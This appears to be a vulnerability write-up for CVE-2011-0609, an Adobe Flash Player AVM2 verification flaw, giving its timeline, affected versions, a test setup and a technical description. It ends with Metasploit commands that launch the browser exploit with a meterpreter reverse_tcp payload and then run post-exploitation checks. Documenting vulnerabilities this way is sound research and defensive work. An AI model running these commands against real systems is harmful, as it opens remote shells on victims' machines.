CVE-2011-0609 : Adobe Flash Player AVM Bytecode Verification Vulnerability

Timeline :

Vulnerability discovered exploited in the wild
This vulnerability was used to attack RSA
First information about the 0day published the 2011-03-11
Security Advisory APSA11-01 posted by the vendor the 2011-03-14
First vulnerability analysis provided by villy the 2011-03-15
Metasploit PoC provided by bannedit the 2011-03-22

PoC provided by :

Unknown
bannedit

Reference(s) :

CVE-2011-0609
APSA11-01
OSVDB-71254

Affected version(s) :

Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.18 and earlier for Chrome users
Adobe Flash Player 10.1.106.16 and earlier versions for Android
Adobe Reader and Acrobat X (10.0.1)
Earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh

Tested on Windows XP SP3 with :

Internet Explorer 6.0.2900.5512
Adobe Flash Player 10.2.152.26

Description :

This module exploits a vulnerability in Adobe Flash Player. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory its fairly difficult to get around this restriction.

Commands :

use exploit/windows/browser/adobe_flashplayer_avm
set SRVHOST 192.168.178.21
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

Long time

sysinfo
getuid